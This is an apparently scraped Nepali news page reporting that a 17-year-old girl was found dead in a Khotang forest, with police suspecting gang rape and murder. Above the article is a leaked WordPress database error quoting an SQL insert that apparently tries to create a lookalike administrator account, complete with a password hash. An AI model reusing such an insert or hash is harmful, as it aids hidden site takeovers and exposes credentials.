WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$B3uXOVMFuWLykXoWWEoPNY4950Bt3q.', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-23 15:28:22', '', 'admlnlx', 'admlnlx')
खोटाङ, माघ २७ –
खोटाङको लिच्कीराम्चे–८ की १७ वर्षकी एक किशोरी मृत अवस्थामा भेटिएकी छन् । मंगलबार रातिदेखि हराएकी किशोरी बुधबार सिमपानी–७ स्थित कुसेऔंशी जंगलमा मृत अवस्थामा भेटिएकी हुन् ।
सिम्पानी बजारको एक होटलमा काम गर्दै आएकी किशोरी मंगलबार बेलुकी घर नफर्किएपछि खोजी गर्दा मृत अवस्थामा भेटिएको आफन्तलाई उद्धृत गर्दै जिल्ला प्रहरी कार्यालय खोटाङका प्रहरी नायव उपरीक्षक नविनकिशोर प्रधानले बताउनुभयो ।
जंगलमा मडारिएको ठाउँ रहेको र मडारिएको ठाउँभन्दा ४० मिटर तल किशोरी मृत अवस्थामा अवस्थामा भेटिएको प्रहरीले जनाएको छ ।
घटनाको प्रकृति हेर्दा सामूहिक बलात्कारपछि हत्या गरिएको हुन सक्ने आशंकामा अनुसन्धान भइरहेको प्रधानले बताउनुभयो ।